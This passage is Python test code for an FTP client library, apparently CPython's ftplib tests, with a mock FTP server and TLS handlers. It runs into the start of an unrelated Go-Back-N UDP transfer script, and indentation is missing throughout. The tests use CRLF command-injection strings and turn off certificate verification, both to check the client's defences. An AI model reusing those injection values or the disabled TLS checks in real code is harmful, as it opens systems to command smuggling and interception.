# connection, including in clear-text (non-TLS) mode.
# (behaviour witnessed with test_data_connection)
if not self.dtp_conn_closed:
self.baseclass.push('226 transfer complete')
self.close()
self.dtp_conn_closed = True
def push(self, what):
if self.baseclass.next_data is not None:
what = self.baseclass.next_data
self.baseclass.next_data = None
if not what:
return self.close_when_done()
super(DummyDTPHandler, self).push(what.encode(self.encoding))
def handle_error(self):
raise Exception
class DummyFTPHandler(asynchat.async_chat):
dtp_handler = DummyDTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
asynchat.async_chat.__init__(self, conn)
# tells the socket to handle urgent data inline (ABOR command)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_OOBINLINE, 1)
self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
self.encoding = encoding
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode(self.encoding)
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode(self.encoding) + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0)) as sock:
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
ip = ip.replace('.', ','); p1 = port / 256; p2 = port % 256
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.create_server((self.socket.getsockname()[0], 0),
family=socket.AF_INET6) as sock:
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET, encoding=DEFAULT_ENCODING):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.daemon = True
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
self.encoding = encoding
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn, encoding=self.encoding)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
context = ssl.SSLContext()
context.load_cert_chain(CERTFILE)
socket = context.wrap_socket(self.socket,
suppress_ragged_eofs=False,
server_side=True,
do_handshake_on_connect=False)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
# TODO: SSLError does not expose alert information
elif "SSLV3_ALERT_BAD_CERTIFICATE" in err.args[1]:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn, encoding=DEFAULT_ENCODING):
DummyFTPHandler.__init__(self, conn, encoding=encoding)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyFTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\n0')
self.assertRaises(ValueError, self.client.sendcmd, 'echo 40\r0')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError,
EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode(self.client.encoding))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode(self.client.encoding))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
data = RETR_DATA.replace('\r\n', '\n').encode(self.client.encoding)
f = io.BytesIO(data)
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with warnings_helper.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = socket_helper.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = socket_helper.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
def test_encoding_param(self):
encodings = ['latin-1', 'utf-8']
for encoding in encodings:
with self.subTest(encoding=encoding):
self.tearDown()
self.setUp(encoding=encoding)
self.assertEqual(encoding, self.client.encoding)
self.test_retrbinary()
self.test_storbinary()
self.test_retrlines()
new_dir = self.client.mkd('/non-ascii dir \xAE')
self.check_data(new_dir, '/non-ascii dir \xAE')
# Check default encoding
client = ftplib.FTP(timeout=TIMEOUT)
self.assertEqual(DEFAULT_ENCODING, client.encoding)
@skipUnless(socket_helper.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0),
af=socket.AF_INET6,
encoding=DEFAULT_ENCODING)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT, encoding=DEFAULT_ENCODING)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode(self.client.encoding))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT, encoding=encoding)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self, encoding=DEFAULT_ENCODING):
self.server = DummyTLS_FTPServer((HOST, 0), encoding=encoding)
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
# Explicitly clear the attribute to prevent dangling thread
self.server = None
asyncore.close_all(ignore_all=True)
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
# consume from SSL socket to finalize handshake and avoid
# "SSLError [SSL] shutdown while in init"
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(sock.recv(1024),
LIST_DATA.encode(self.client.encoding))
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
@skipUnless(False, "FIXME: bpo-32706")
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.check_hostname, True)
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = socket_helper.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.daemon = True
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
# Explicitly clear the attribute to prevent dangling thread
self.server_thread = None
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
# bpo-39259
with self.assertRaises(ValueError):
ftplib.FTP(HOST, timeout=0)
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
not_exported = {
'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF', 'Error',
'parse150', 'parse227', 'parse229', 'parse257', 'print_line',
'ftpcp', 'test'}
support.check__all__(self, ftplib, not_exported=not_exported)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
GoBackN.py
|
import socket
import math
import time
import threading
from Helpers import PacketState, calc_checksum, lose_the_packet, make_ack_packet, print_progress_bar
PACKET_SIZE = 200
HEADER_SIZE = 12
SERVER_PORT_NO = None
PLP = None
WINDOW_SIZE = None
MAX_SEQ_NO = None
main_lock = threading.Lock()
threads = []
state = {
'base': 0,
'packets': [],
'acks_count': 0
}
# States:
# 0: not sent
# 1: sent
# 2: acked
def start(filename):
global SERVER_PORT_NO, WINDOW_SIZE, MAX_SEQ_NO, PLP
file = open(filename, 'r')
configs = file.read()
configs = configs.split('\n')
SERVER_PORT_NO = int(configs[0].split(':')[1].strip())
WINDOW_SIZE = int(configs[1].split(':')[1].strip())
MAX_SEQ_NO = WINDOW_SIZE
PLP = float(configs[2].split(':')[1].strip())
main_socket = make_socket(SERVER_PORT_NO)
start_listening(main_socket, PACKET_SIZE)
def make_socket(port_no):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', port_no))
return sock
def start_listening(main_socket, datagram_size):
file_data, address = main_socket.recvfrom(datagram_size)
ack_pkt = make_ack_packet(0)
main_socket.sendto(bytes(ack_pkt, 'UTF-8'), address)
file = open('files/{}'.format(file_data.decode().split('&$')[1]))
file_data = file.read()
no_of_pkts = int(math.ceil(len(file_data) / (PACKET_SIZE - HEADER_SIZE)))
